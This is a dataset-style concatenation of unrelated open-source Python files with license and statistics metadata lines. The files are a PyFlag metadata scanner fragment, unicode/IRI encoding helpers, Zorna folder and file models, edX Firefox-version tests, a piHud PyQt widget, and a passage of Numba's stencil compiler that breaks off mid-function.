class ExtractorScan(GenScanFactory):
""" A Scanner to collect metadata about files """
order = 90
default = True
depends = 'TypeScan'
class Scan(StoreAndScanType):
types = (
# This forces all images to be cached do we really want this?
# 'image/.*',
'application/msword',
'application/x-executable'
)
def external_process(self,fd):
dbh=DB.DBO(self.case)
meta=E.extractFromFile(fd.name)
dbh = DB.DBO(self.case)
for pair in meta:
dbh.insert("xattr",
inode_id = self.fd.lookup_id(),
property = pair[0],
value = pair[1],
)
class BrowseMetadata(Reports.report):
"""
Browse Metadata
---------------
PyFlag can use the libextractor scanner to gather many
interesting facts about files being scanned. The specifics of
this metadata depends on libextractor, but generally metadata
reveals intimate details relating to the files - such as
authors, creation times etc.
This report simply presents the data in a tabular format so it
can be searched simply.
"""
name = "Browse Metadata"
family = "Disk Forensics"
def display(self, query, result):
result.table(
elements = [ InodeIDType(case=query['case']),
StringType('Property','property'),
StringType('Value','value')],
table = 'xattr',
case = query['case'],
)
except ImportError:
pass
| gpl-2.0 | -7,346,227,057,464,774,000 | 30.173913 | 70 | 0.527662 | false |
dvliman/jaikuengine | vendor/cleanliness/encoding.py | 9 | 3595 | import datetime
import urllib
import types
def smart_unicode(s, encoding='utf-8', strings_only=False, errors='strict'):
"""
Returns a unicode object representing 's'. Treats bytestrings using the
'encoding' codec.
If strings_only is True, don't convert (some) non-string-like objects.
"""
return force_unicode(s, encoding, strings_only, errors)
def force_unicode(s, encoding='utf-8', strings_only=False, errors='strict'):
"""
Similar to smart_unicode, except that lazy instances are resolved to
strings, rather than kept as lazy objects.
If strings_only is True, don't convert (some) non-string-like objects.
"""
if strings_only and isinstance(s,
(types.NoneType, int, long,
datetime.datetime, datetime.date,
datetime.time, float)):
return s
try:
if not isinstance(s, basestring,):
if hasattr(s, '__unicode__'):
s = unicode(s)
else:
try:
s = unicode(str(s), encoding, errors)
except UnicodeEncodeError:
if not isinstance(s, Exception):
raise
# If we get to here, the caller has passed in an Exception
# subclass populated with non-ASCII data without special
# handling to display as a string. We need to handle this
# without raising a further exception. We do an
# approximation to what the Exception's standard str()
# output should be.
s = ' '.join([force_unicode(arg, encoding, strings_only,
errors)
for arg in s])
elif not isinstance(s, unicode):
# Note: We use .decode() here, instead of unicode(s, encoding,
# errors), so that if s is a SafeString, it ends up being a
# SafeUnicode at the end.
s = s.decode(encoding, errors)
except UnicodeDecodeError, e:
raise
return s
def smart_str(s, encoding='utf-8', strings_only=False, errors='strict'):
"""
Returns a bytestring version of 's', encoded as specified in 'encoding'.
If strings_only is True, don't convert (some) non-string-like objects.
"""
if strings_only and isinstance(s, (types.NoneType, int)):
return s
elif not isinstance(s, basestring):
try:
return str(s)
except UnicodeEncodeError:
if isinstance(s, Exception):
# An Exception subclass containing non-ASCII data that doesn't
# know how to print itself properly. We shouldn't raise a
# further exception.
return ' '.join([smart_str(arg, encoding, strings_only,
errors) for arg in s])
return unicode(s).encode(encoding, errors)
elif isinstance(s, unicode):
return s.encode(encoding, errors)
elif s and encoding != 'utf-8':
return s.decode('utf-8', errors).encode(encoding, errors)
else:
return s
def iri_to_uri(iri):
"""
Convert an Internationalized Resource Identifier (IRI) portion to a URI
portion that is suitable for inclusion in a URL.
This is the algorithm from section 3.1 of RFC 3987. However, since we are
assuming input is either UTF-8 or unicode already, we can simplify things a
little from the full method.
Returns an ASCII string containing the encoded result.
"""
# The list of safe characters here is constructed from the printable ASCII
# characters that are not explicitly excluded by the list at the end of
# section 3.1 of RFC 3987.
if iri is None:
return iri
return urllib.quote(smart_str(iri), safe='/#%[]=:;$&()+,!?*')
| apache-2.0 | 7,356,977,162,781,316,000 | 36.061856 | 77 | 0.636161 | false |
zorna/zorna | zorna/fileman/models.py | 1 | 3426 | import os
from django.conf import settings
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import ugettext_noop
from django.core.urlresolvers import reverse
from mptt.models import MPTTModel
from tagging.fields import TagField
from tagging.utils import parse_tag_input
from tagging.models import Tag
from zorna.models import ZornaEntity
from zorna.fileman.managers import ZornaFolderManager
from zorna.utilit import get_upload_library
FOLDER_NOTIFICATIONS = (
(0, _(u'No email notification')),
(1, _(u'Send email notification')),
(2, _(u'Let the author decide')),
)
class ZornaFolder(MPTTModel, ZornaEntity):
parent = models.ForeignKey(
'self', null=True, blank=True, related_name='children')
name = models.CharField(_('name'), max_length=255)
slug = models.SlugField(_('slug'), max_length=255, null=True, blank=True)
inherit_permissions = models.BooleanField(_(u'Inherit permissions'))
email_notification = models.IntegerField(max_length=1, choices=FOLDER_NOTIFICATIONS, default=0, help_text=_(
u'Users will receive email notification when a file is uploaded or updated'))
objects = ZornaFolderManager()
class Meta:
verbose_name = _('folder')
verbose_name_plural = _('folders')
ordering = ['tree_id', 'lft']
db_table = settings.TABLE_PREFIX + "folders"
def __unicode__(self):
return self.name
def get_complete_slug(self):
url = u''
for ancestor in self.get_ancestors(ascending=True):
url = ancestor.slug + u'/' + url
return url
def get_acl_permissions():
return {
'reader': ugettext_noop(u'Who can browse this folder'),
'writer': ugettext_noop(u'Who can upload files to this folder'),
'manager': ugettext_noop(u'Who can manage this folder'),
}
get_acl_permissions = staticmethod(get_acl_permissions)
class ZornaFile(ZornaEntity):
description = models.CharField(max_length=255)
folder = models.CharField(_(
'root_folder'), max_length=255, default='', editable=False)
tags = TagField()
class Meta:
verbose_name = _('file')
db_table = settings.TABLE_PREFIX + "files"
def __unicode__(self):
return _(u'file %s') % self.description
def delete(self):
# Deleting all asociated tags.
Tag.objects.update_tags(self, None)
super(ZornaFile, self).delete()
def get_tag_list(self):
return parse_tag_input(self.tags)
def get_file_info(self):
root_path = get_upload_library()
info = {}
fullpath = u"%s/%s" % (root_path, self.folder)
for dirName, subdirList, fileList in os.walk(fullpath):
for file_name in fileList:
tab = file_name.split(',')
if len(tab) > 1 and tab[0].isdigit():
pk, filename = tab[0], ','.join(tab[1:])
if int(pk) == self.pk:
info['filename'] = filename
url_component = dirName[len(
root_path) + 1:].replace('\\', '/')
info['url'] = reverse('get_file') + '?file=' + url_component + '/%s,%s' % (self.pk, filename)
info['path'] = url_component
return info
return info
| bsd-3-clause | -1,226,782,338,633,117,200 | 34.6875 | 117 | 0.607998 | false |
kmoocdev2/edx-platform | pavelib/paver_tests/test_utils.py | 20 | 1574 | """
Tests for pavelib/utils/test/utils
"""
import unittest
from mock import patch
from pavelib.utils.envs import Env
from pavelib.utils.test.utils import MINIMUM_FIREFOX_VERSION, check_firefox_version
@unittest.skipIf(Env.USING_DOCKER, 'Firefox version check works differently under Docker Devstack')
class TestUtils(unittest.TestCase):
"""
Test utils.py under pavelib/utils/test
"""
@patch('subprocess.check_output')
def test_firefox_version_ok(self, _mock_subprocesss):
test_version = MINIMUM_FIREFOX_VERSION
_mock_subprocesss.return_value = "Mozilla Firefox {version}".format(
version=str(test_version)
)
# No exception should be raised
check_firefox_version()
@patch('subprocess.check_output')
def test_firefox_version_below_expected(self, _mock_subprocesss):
test_version = MINIMUM_FIREFOX_VERSION - 1
_mock_subprocesss.return_value = "Mozilla Firefox {version}".format(
version=test_version
)
with self.assertRaises(Exception):
check_firefox_version()
@patch('subprocess.check_output')
def test_firefox_version_not_detected(self, _mock_subprocesss):
_mock_subprocesss.return_value = "Mozilla Firefox"
with self.assertRaises(Exception):
check_firefox_version()
@patch('subprocess.check_output')
def test_firefox_version_bad(self, _mock_subprocesss):
_mock_subprocesss.return_value = "garbage"
with self.assertRaises(Exception):
check_firefox_version()
| agpl-3.0 | 7,533,373,007,488,369,000 | 32.489362 | 99 | 0.679797 | false |
brendanwhitfield/piHud | pihud/Widget.py | 2 | 2727 |
import obd
from widgets import widgets
from PyQt4 import QtCore, QtGui
class Widget(QtGui.QWidget):
def __init__(self, parent, config):
super(Widget, self).__init__(parent)
self.config = config
# temporary coloring until display widgets get implemented
# self.setAutoFillBackground(True)
# palette = self.palette()
# palette.setColor(self.backgroundRole(), QtGui.QColor(255, 255, 255, 50))
# self.setPalette(palette)
# make the context menu
self.menu = QtGui.QMenu()
self.menu.addAction(self.config["sensor"]).setDisabled(True)
subMenu = self.menu.addMenu("Widget Type")
for w in widgets:
a = subMenu.addAction(w)
a.setData(widgets[w])
self.menu.addAction("Delete Widget", self.delete)
# instantiate the requested graphics object
self.graphics = widgets[config["type"]](self, config)
self.move(self.position())
self.show()
def sizeHint(self):
if (self.config['w'] is not None) and \
(self.config['h'] is not None):
size = QtCore.QSize(self.config['w'], self.config['h'])
self.graphics.setFixedSize(size)
return size
else:
s = self.graphics.sizeHint()
self.config['w'] = s.width()
self.config['h'] = s.height()
return s
def position(self):
return QtCore.QPoint(self.config['x'], self.config['y'])
def moveEvent(self, e):
pos = e.pos()
self.config['x'] = pos.x()
self.config['y'] = pos.y()
def delete(self):
self.parent().delete_widget(self)
def mouseMoveEvent(self, e):
if e.buttons() == QtCore.Qt.LeftButton:
mimeData = QtCore.QMimeData()
mimeData.setText('%d,%d' % (e.x(), e.y()))
# show the ghost image while dragging
pixmap = QtGui.QPixmap.grabWidget(self)
painter = QtGui.QPainter(pixmap)
painter.fillRect(pixmap.rect(), QtGui.QColor(0, 0, 0, 127))
painter.end()
drag = QtGui.QDrag(self)
drag.setMimeData(mimeData)
drag.setPixmap(pixmap)
drag.setHotSpot(e.pos())
drag.exec_(QtCore.Qt.MoveAction)
def contextMenuEvent(self, e):
action = self.menu.exec_(self.mapToGlobal(e.pos()))
def get_command(self):
s = self.config["sensor"]
if s in obd.commands:
return obd.commands[s]
else:
raise KeyError("'%s' is not a valid OBDCommand" % s)
def render(self, response):
if not response.is_null():
self.graphics.render(response)
| lgpl-2.1 | 5,463,960,265,789,432,000 | 26.826531 | 82 | 0.567657 | false |
numba/numba | numba/stencils/stencil.py | 4 | 39074 | #
# Copyright (c) 2017 Intel Corporation
# SPDX-License-Identifier: BSD-2-Clause
#
import copy
import numpy as np
from llvmlite import ir as lir
from numba.core import types, typing, utils, ir, config, ir_utils, registry
from numba.core.typing.templates import (CallableTemplate, signature,
infer_global, AbstractTemplate)
from numba.core.imputils import lower_builtin
from numba.core.extending import register_jitable
from numba.misc.special import literal_unroll
import numba
import operator
from numba.np import numpy_support
class StencilFuncLowerer(object):
'''Callable class responsible for lowering calls to a specific StencilFunc.
'''
def __init__(self, sf):
self.stencilFunc = sf
def __call__(self, context, builder, sig, args):
cres = self.stencilFunc.compile_for_argtys(sig.args, {},
sig.return_type, None)
res = context.call_internal(builder, cres.fndesc, sig, args)
context.add_linking_libs([cres.library])
return res
@register_jitable
def raise_if_incompatible_array_sizes(a, *args):
ashape = a.shape
# We need literal_unroll here because the stencil might take
# multiple input arrays with different types that are not compatible
# (e.g. values as float[:] and flags as bool[:])
# When more than three total arrays are given, the second and third
# are iterated over in the loop below. Without literal_unroll, their
# types have to match.
# An example failing signature without literal_unroll might be
# (float[:], float[:], bool[:]) (Just (float[:], bool[:]) wouldn't fail)
for arg in literal_unroll(args):
if a.ndim != arg.ndim:
raise ValueError("Secondary stencil array does not have same number "
" of dimensions as the first stencil input.")
argshape = arg.shape
for i in range(len(ashape)):
if ashape[i] > argshape[i]:
raise ValueError("Secondary stencil array has some dimension "
"smaller the same dimension in the first "
"stencil input.")
def slice_addition(the_slice, addend):
""" Called by stencil in Python mode to add the loop index to a
user-specified slice.
"""
return slice(the_slice.start + addend, the_slice.stop + addend)
class StencilFunc(object):
"""
A special type to hold stencil information for the IR.
"""
id_counter = 0
def __init__(self, kernel_ir, mode, options):
self.id = type(self).id_counter
type(self).id_counter += 1
self.kernel_ir = kernel_ir
self.mode = mode
self.options = options
self.kws = [] # remember original kws arguments
# stencils only supported for CPU context currently
self._typingctx = registry.cpu_target.typing_context
self._targetctx = registry.cpu_target.target_context
self._typingctx.refresh()
self._targetctx.refresh()
self._install_type(self._typingctx)
self.neighborhood = self.options.get("neighborhood")
self._type_cache = {}
self._lower_me = StencilFuncLowerer(self)
def replace_return_with_setitem(self, blocks, index_vars, out_name):
"""
Find return statements in the IR and replace them with a SetItem
call of the value "returned" by the kernel into the result array.
Returns the block labels that contained return statements.
"""
ret_blocks = []
for label, block in blocks.items():
scope = block.scope
loc = block.loc
new_body = []
for stmt in block.body:
if isinstance(stmt, ir.Return):
ret_blocks.append(label)
# If 1D array then avoid the tuple construction.
if len(index_vars) == 1:
rvar = ir.Var(scope, out_name, loc)
ivar = ir.Var(scope, index_vars[0], loc)
new_body.append(ir.SetItem(rvar, ivar, stmt.value, loc))
else:
# Convert the string names of the index variables into
# ir.Var's.
var_index_vars = []
for one_var in index_vars:
index_var = ir.Var(scope, one_var, loc)
var_index_vars += [index_var]
s_index_name = ir_utils.mk_unique_var("stencil_index")
s_index_var = ir.Var(scope, s_index_name, loc)
# Build a tuple from the index ir.Var's.
tuple_call = ir.Expr.build_tuple(var_index_vars, loc)
new_body.append(ir.Assign(tuple_call, s_index_var, loc))
rvar = ir.Var(scope, out_name, loc)
# Write the return statements original value into
# the array using the tuple index.
si = ir.SetItem(rvar, s_index_var, stmt.value, loc)
new_body.append(si)
else:
new_body.append(stmt)
block.body = new_body
return ret_blocks
def add_indices_to_kernel(self, kernel, index_names, ndim,
neighborhood, standard_indexed, typemap, calltypes):
"""
Transforms the stencil kernel as specified by the user into one
that includes each dimension's index variable as part of the getitem
calls. So, in effect array[-1] becomes array[index0-1].
"""
const_dict = {}
kernel_consts = []
if config.DEBUG_ARRAY_OPT >= 1:
print("add_indices_to_kernel", ndim, neighborhood)
ir_utils.dump_blocks(kernel.blocks)
if neighborhood is None:
need_to_calc_kernel = True
else:
need_to_calc_kernel = False
if len(neighborhood) != ndim:
raise ValueError("%d dimensional neighborhood specified for %d " \
"dimensional input array" % (len(neighborhood), ndim))
tuple_table = ir_utils.get_tuple_table(kernel.blocks)
relatively_indexed = set()
for block in kernel.blocks.values():
scope = block.scope
loc = block.loc
new_body = []
for stmt in block.body:
if (isinstance(stmt, ir.Assign) and
isinstance(stmt.value, ir.Const)):
if config.DEBUG_ARRAY_OPT >= 1:
print("remembering in const_dict", stmt.target.name,
stmt.value.value)
# Remember consts for use later.
const_dict[stmt.target.name] = stmt.value.value
if ((isinstance(stmt, ir.Assign)
and isinstance(stmt.value, ir.Expr)
and stmt.value.op in ['setitem', 'static_setitem']
and stmt.value.value.name in kernel.arg_names) or
(isinstance(stmt, ir.SetItem)
and stmt.target.name in kernel.arg_names)):
raise ValueError("Assignments to arrays passed to stencil " \
"kernels is not allowed.")
if (isinstance(stmt, ir.Assign)
and isinstance(stmt.value, ir.Expr)
and stmt.value.op in ['getitem', 'static_getitem']
and stmt.value.value.name in kernel.arg_names
and stmt.value.value.name not in standard_indexed):
# We found a getitem from the input array.
if stmt.value.op == 'getitem':
stmt_index_var = stmt.value.index
else:
stmt_index_var = stmt.value.index_var
# allow static_getitem since rewrite passes are applied
#raise ValueError("Unexpected static_getitem in add_indices_to_kernel.")
relatively_indexed.add(stmt.value.value.name)
# Store the index used after looking up the variable in
# the const dictionary.
if need_to_calc_kernel:
assert hasattr(stmt_index_var, 'name')
if stmt_index_var.name in tuple_table:
kernel_consts += [tuple_table[stmt_index_var.name]]
elif stmt_index_var.name in const_dict:
kernel_consts += [const_dict[stmt_index_var.name]]
else:
raise ValueError("stencil kernel index is not "
"constant, 'neighborhood' option required")
if ndim == 1:
# Single dimension always has index variable 'index0'.
# tmpvar will hold the real index and is computed by
# adding the relative offset in stmt.value.index to
# the current absolute location in index0.
index_var = ir.Var(scope, index_names[0], loc)
tmpname = ir_utils.mk_unique_var("stencil_index")
tmpvar = ir.Var(scope, tmpname, loc)
stmt_index_var_typ = typemap[stmt_index_var.name]
# If the array is indexed with a slice then we
# have to add the index value with a call to
# slice_addition.
if isinstance(stmt_index_var_typ, types.misc.SliceType):
sa_var = ir.Var(scope, ir_utils.mk_unique_var("slice_addition"), loc)
sa_func = numba.njit(slice_addition)
sa_func_typ = types.functions.Dispatcher(sa_func)
typemap[sa_var.name] = sa_func_typ
g_sa = ir.Global("slice_addition", sa_func, loc)
new_body.append(ir.Assign(g_sa, sa_var, loc))
slice_addition_call = ir.Expr.call(sa_var, [stmt_index_var, index_var], (), loc)
calltypes[slice_addition_call] = sa_func_typ.get_call_type(self._typingctx, [stmt_index_var_typ, types.intp], {})
new_body.append(ir.Assign(slice_addition_call, tmpvar, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value, tmpvar, loc),
stmt.target, loc))
else:
acc_call = ir.Expr.binop(operator.add, stmt_index_var,
index_var, loc)
new_body.append(ir.Assign(acc_call, tmpvar, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value, tmpvar, loc),
stmt.target, loc))
else:
index_vars = []
sum_results = []
s_index_name = ir_utils.mk_unique_var("stencil_index")
s_index_var = ir.Var(scope, s_index_name, loc)
const_index_vars = []
ind_stencils = []
stmt_index_var_typ = typemap[stmt_index_var.name]
# Same idea as above but you have to extract
# individual elements out of the tuple indexing
# expression and add the corresponding index variable
# to them and then reconstitute as a tuple that can
# index the array.
for dim in range(ndim):
tmpname = ir_utils.mk_unique_var("const_index")
tmpvar = ir.Var(scope, tmpname, loc)
new_body.append(ir.Assign(ir.Const(dim, loc),
tmpvar, loc))
const_index_vars += [tmpvar]
index_var = ir.Var(scope, index_names[dim], loc)
index_vars += [index_var]
tmpname = ir_utils.mk_unique_var("ind_stencil_index")
tmpvar = ir.Var(scope, tmpname, loc)
ind_stencils += [tmpvar]
getitemname = ir_utils.mk_unique_var("getitem")
getitemvar = ir.Var(scope, getitemname, loc)
getitemcall = ir.Expr.getitem(stmt_index_var,
const_index_vars[dim], loc)
new_body.append(ir.Assign(getitemcall, getitemvar, loc))
# Get the type of this particular part of the index tuple.
if isinstance(stmt_index_var_typ, types.ConstSized):
one_index_typ = stmt_index_var_typ[dim]
else:
one_index_typ = stmt_index_var_typ[:]
# If the array is indexed with a slice then we
# have to add the index value with a call to
# slice_addition.
if isinstance(one_index_typ, types.misc.SliceType):
sa_var = ir.Var(scope, ir_utils.mk_unique_var("slice_addition"), loc)
sa_func = numba.njit(slice_addition)
sa_func_typ = types.functions.Dispatcher(sa_func)
typemap[sa_var.name] = sa_func_typ
g_sa = ir.Global("slice_addition", sa_func, loc)
new_body.append(ir.Assign(g_sa, sa_var, loc))
slice_addition_call = ir.Expr.call(sa_var, [getitemvar, index_vars[dim]], (), loc)
calltypes[slice_addition_call] = sa_func_typ.get_call_type(self._typingctx, [one_index_typ, types.intp], {})
new_body.append(ir.Assign(slice_addition_call, tmpvar, loc))
else:
acc_call = ir.Expr.binop(operator.add, getitemvar,
index_vars[dim], loc)
new_body.append(ir.Assign(acc_call, tmpvar, loc))
tuple_call = ir.Expr.build_tuple(ind_stencils, loc)
new_body.append(ir.Assign(tuple_call, s_index_var, loc))
new_body.append(ir.Assign(
ir.Expr.getitem(stmt.value.value,s_index_var,loc),
stmt.target,loc))
else:
new_body.append(stmt)
block.body = new_body
if need_to_calc_kernel:
# Find the size of the kernel by finding the maximum absolute value
# index used in the kernel specification.
neighborhood = [[0,0] for _ in range(ndim)]
if len(kernel_consts) == 0:
raise ValueError("Stencil kernel with no accesses to "
"relatively indexed arrays.")
for index in kernel_consts:
if isinstance(index, tuple) or isinstance(index, list):
for i in range(len(index)):
te = index[i]
if isinstance(te, ir.Var) and te.name in const_dict:
te = const_dict[te.name]
if isinstance(te, int):
neighborhood[i][0] = min(neighborhood[i][0], te)
neighborhood[i][1] = max(neighborhood[i][1], te)
else:
raise ValueError(
"stencil kernel index is not constant,"
"'neighborhood' option required")
index_len = len(index)
elif isinstance(index, int):
neighborhood[0][0] = min(neighborhood[0][0], index)
neighborhood[0][1] = max(neighborhood[0][1], index)
index_len = 1
else:
raise ValueError(
"Non-tuple or non-integer used as stencil index.")
if index_len != ndim:
raise ValueError(
"Stencil index does not match array dimensionality.")
return (neighborhood, relatively_indexed)
def get_return_type(self, argtys):
if config.DEBUG_ARRAY_OPT >= 1:
print("get_return_type", argtys)
ir_utils.dump_blocks(self.kernel_ir.blocks)
if not isinstance(argtys[0], types.npytypes.Array):
raise ValueError("The first argument to a stencil kernel must "
"be the primary input array.")
from numba.core import typed_passes
typemap, return_type, calltypes, _ = typed_passes.type_inference_stage(
self._typingctx,
self._targetctx,
self.kernel_ir,
argtys,
None,
{})
if isinstance(return_type, types.npytypes.Array):
raise ValueError(
"Stencil kernel must return a scalar and not a numpy array.")
real_ret = types.npytypes.Array(return_type, argtys[0].ndim,
argtys[0].layout)
return (real_ret, typemap, calltypes)
def _install_type(self, typingctx):
"""Constructs and installs a typing class for a StencilFunc object in
the input typing context.
"""
_ty_cls = type('StencilFuncTyping_' +
str(self.id),
(AbstractTemplate,),
dict(key=self, generic=self._type_me))
typingctx.insert_user_function(self, _ty_cls)
def compile_for_argtys(self, argtys, kwtys, return_type, sigret):
# look in the type cache to find if result array is passed
(_, result, typemap, calltypes) = self._type_cache[argtys]
new_func = self._stencil_wrapper(result, sigret, return_type,
typemap, calltypes, *argtys)
return new_func
def _type_me(self, argtys, kwtys):
"""
Implement AbstractTemplate.generic() for the typing class
built by StencilFunc._install_type().
Return the call-site signature.
"""
if (self.neighborhood is not None and
len(self.neighborhood) != argtys[0].ndim):
raise ValueError("%d dimensional neighborhood specified "
"for %d dimensional input array" %
(len(self.neighborhood), argtys[0].ndim))
argtys_extra = argtys
sig_extra = ""
result = None
if 'out' in kwtys:
argtys_extra += (kwtys['out'],)
sig_extra += ", out=None"
result = kwtys['out']
if 'neighborhood' in kwtys:
argtys_extra += (kwtys['neighborhood'],)
sig_extra += ", neighborhood=None"
# look in the type cache first
if argtys_extra in self._type_cache:
(_sig, _, _, _) = self._type_cache[argtys_extra]
return _sig
(real_ret, typemap, calltypes) = self.get_return_type(argtys)
sig = signature(real_ret, *argtys_extra)
dummy_text = ("def __numba_dummy_stencil({}{}):\n pass\n".format(
",".join(self.kernel_ir.arg_names), sig_extra))
exec(dummy_text) in globals(), locals()
dummy_func = eval("__numba_dummy_stencil")
sig = sig.replace(pysig=utils.pysignature(dummy_func))
self._targetctx.insert_func_defn([(self._lower_me, self, argtys_extra)])
self._type_cache[argtys_extra] = (sig, result, typemap, calltypes)
return sig
def copy_ir_with_calltypes(self, ir, calltypes):
"""
Create a copy of a given IR along with its calltype information.
We need a copy of the calltypes because copy propagation applied
to the copied IR will change the calltypes and make subsequent
uses of the original IR invalid.
"""
copy_calltypes = {}
kernel_copy = ir.copy()
kernel_copy.blocks = {}
# For each block...
for (block_label, block) in ir.blocks.items():
new_block = copy.deepcopy(ir.blocks[block_label])
new_block.body = []
# For each statement in each block...
for stmt in ir.blocks[block_label].body:
# Copy the statement to the new copy of the kernel
# and if the original statement is in the original
# calltypes then add the type associated with this
# statement to the calltypes copy.
scopy = copy.deepcopy(stmt)
new_block.body.append(scopy)
if stmt in calltypes:
copy_calltypes[scopy] = calltypes[stmt]
kernel_copy.blocks[block_label] = new_block
return (kernel_copy, copy_calltypes)
def _stencil_wrapper(self, result, sigret, return_type, typemap, calltypes, *args):
# Overall approach:
# 1) Construct a string containing a function definition for the stencil function
# that will execute the stencil kernel. This function definition includes a
# unique stencil function name, the parameters to the stencil kernel, loop
# nests across the dimensions of the input array. Those loop nests use the
# computed stencil kernel size so as not to try to compute elements where
# elements outside the bounds of the input array would be needed.
# 2) The but of the loop nest in this new function is a special sentinel
# assignment.
# 3) Get the IR of this new function.
# 4) Split the block containing the sentinel assignment and remove the sentinel
# assignment. Insert the stencil kernel IR into the stencil function IR
# after label and variable renaming of the stencil kernel IR to prevent
# conflicts with the stencil function IR.
# 5) Compile the combined stencil function IR + stencil kernel IR into existence.
# Copy the kernel so that our changes for this callsite
# won't effect other callsites.
(kernel_copy, copy_calltypes) = self.copy_ir_with_calltypes(
self.kernel_ir, calltypes)
# The stencil kernel body becomes the body of a loop, for which args aren't needed.
ir_utils.remove_args(kernel_copy.blocks)
first_arg = kernel_copy.arg_names[0]
in_cps, out_cps = ir_utils.copy_propagate(kernel_copy.blocks, typemap)
name_var_table = ir_utils.get_name_var_table(kernel_copy.blocks)
ir_utils.apply_copy_propagate(
kernel_copy.blocks,
in_cps,
name_var_table,
typemap,
copy_calltypes)
if "out" in name_var_table:
raise ValueError("Cannot use the reserved word 'out' in stencil kernels.")
sentinel_name = ir_utils.get_unused_var_name("__sentinel__", name_var_table)
if config.DEBUG_ARRAY_OPT >= 1:
print("name_var_table", name_var_table, sentinel_name)
the_array = args[0]
if config.DEBUG_ARRAY_OPT >= 1:
print("_stencil_wrapper", return_type, return_type.dtype,
type(return_type.dtype), args)
ir_utils.dump_blocks(kernel_copy.blocks)
# We generate a Numba function to execute this stencil and here
# create the unique name of this function.
stencil_func_name = "__numba_stencil_%s_%s" % (
hex(id(the_array)).replace("-", "_"),
self.id)
# We will put a loop nest in the generated function for each
# dimension in the input array. Here we create the name for
# the index variable for each dimension. index0, index1, ...
index_vars = []
for i in range(the_array.ndim):
index_var_name = ir_utils.get_unused_var_name("index" + str(i),
name_var_table)
index_vars += [index_var_name]
# Create extra signature for out and neighborhood.
out_name = ir_utils.get_unused_var_name("out", name_var_table)
neighborhood_name = ir_utils.get_unused_var_name("neighborhood",
name_var_table)
sig_extra = ""
if result is not None:
sig_extra += ", {}=None".format(out_name)
if "neighborhood" in dict(self.kws):
sig_extra += ", {}=None".format(neighborhood_name)
# Get a list of the standard indexed array names.
standard_indexed = self.options.get("standard_indexing", [])
if first_arg in standard_indexed:
raise ValueError("The first argument to a stencil kernel must "
"use relative indexing, not standard indexing.")
if len(set(standard_indexed) - set(kernel_copy.arg_names)) != 0:
raise ValueError("Standard indexing requested for an array name "
"not present in the stencil kernel definition.")
# Add index variables to getitems in the IR to transition the accesses
# in the kernel from relative to regular Python indexing. Returns the
# computed size of the stencil kernel and a list of the relatively indexed
# arrays.
kernel_size, relatively_indexed = self.add_indices_to_kernel(
kernel_copy, index_vars, the_array.ndim,
self.neighborhood, standard_indexed, typemap, copy_calltypes)
if self.neighborhood is None:
self.neighborhood = kernel_size
if config.DEBUG_ARRAY_OPT >= 1:
print("After add_indices_to_kernel")
ir_utils.dump_blocks(kernel_copy.blocks)
# The return in the stencil kernel becomes a setitem for that
# particular point in the iteration space.
ret_blocks = self.replace_return_with_setitem(kernel_copy.blocks,
index_vars, out_name)
if config.DEBUG_ARRAY_OPT >= 1:
print("After replace_return_with_setitem", ret_blocks)
ir_utils.dump_blocks(kernel_copy.blocks)
# Start to form the new function to execute the stencil kernel.
func_text = "def {}({}{}):\n".format(stencil_func_name,
",".join(kernel_copy.arg_names), sig_extra)
# Get loop ranges for each dimension, which could be either int
# or variable. In the latter case we'll use the extra neighborhood
# argument to the function.
ranges = []
for i in range(the_array.ndim):
if isinstance(kernel_size[i][0], int):
lo = kernel_size[i][0]
hi = kernel_size[i][1]
else:
lo = "{}[{}][0]".format(neighborhood_name, i)
hi = "{}[{}][1]".format(neighborhood_name, i)
ranges.append((lo, hi))
# If there are more than one relatively indexed arrays, add a call to
# a function that will raise an error if any of the relatively indexed
# arrays are of different size than the first input array.
if len(relatively_indexed) > 1:
func_text += " raise_if_incompatible_array_sizes(" + first_arg
for other_array in relatively_indexed:
if other_array != first_arg:
func_text += "," + other_array
func_text += ")\n"
# Get the shape of the first input array.
shape_name = ir_utils.get_unused_var_name("full_shape", name_var_table)
func_text += " {} = {}.shape\n".format(shape_name, first_arg)
# If we have to allocate the output array (the out argument was not used)
# then us numpy.full if the user specified a cval stencil decorator option
# or np.zeros if they didn't to allocate the array.
if result is None:
return_type_name = numpy_support.as_dtype(
return_type.dtype).type.__name__
if "cval" in self.options:
cval = self.options["cval"]
if return_type.dtype != typing.typeof.typeof(cval):
raise ValueError(
"cval type does not match stencil return type.")
out_init ="{} = np.full({}, {}, dtype=np.{})\n".format(
out_name, shape_name, cval, return_type_name)
else:
out_init ="{} = np.zeros({}, dtype=np.{})\n".format(
out_name, shape_name, return_type_name)
func_text += " " + out_init
else: # result is present, if cval is set then use it
if "cval" in self.options:
cval = self.options["cval"]
cval_ty = typing.typeof.typeof(cval)
if not self._typingctx.can_convert(cval_ty, return_type.dtype):
msg = "cval type does not match stencil return type."
raise ValueError(msg)
out_init = "{}[:] = {}\n".format(out_name, cval)
func_text += " " + out_init
offset = 1
# Add the loop nests to the new function.
for i in range(the_array.ndim):
for j in range(offset):
func_text += " "
# ranges[i][0] is the minimum index used in the i'th dimension
# but minimum's greater than 0 don't preclude any entry in the array.
# So, take the minimum of 0 and the minimum index found in the kernel
# and this will be a negative number (potentially -0). Then, we do
# unary - on that to get the positive offset in this dimension whose
# use is precluded.
# ranges[i][1] is the maximum of 0 and the observed maximum index
# in this dimension because negative maximums would not cause us to
# preclude any entry in the array from being used.
func_text += ("for {} in range(-min(0,{}),"
"{}[{}]-max(0,{})):\n").format(
index_vars[i],
ranges[i][0],
shape_name,
i,
ranges[i][1])
offset += 1
for j in range(offset):
func_text += " "
# Put a sentinel in the code so we can locate it in the IR. We will
# remove this sentinel assignment and replace it with the IR for the
# stencil kernel body.
func_text += "{} = 0\n".format(sentinel_name)
func_text += " return {}\n".format(out_name)
if config.DEBUG_ARRAY_OPT >= 1:
print("new stencil func text")
print(func_text)
# Force the new stencil function into existence.
exec(func_text) in globals(), locals()
stencil_func = eval(stencil_func_name)
if sigret is not None:
pysig = utils.pysignature(stencil_func)
sigret.pysig = pysig
# Get the IR for the newly created stencil function.
from numba.core import compiler
stencil_ir = compiler.run_frontend(stencil_func)
ir_utils.remove_dels(stencil_ir.blocks)
# rename all variables in stencil_ir afresh
var_table = ir_utils.get_name_var_table(stencil_ir.blocks)
new_var_dict = {}
reserved_names = ([sentinel_name, out_name, neighborhood_name,
shape_name] + kernel_copy.arg_names + index_vars)
for name, var in var_table.items():
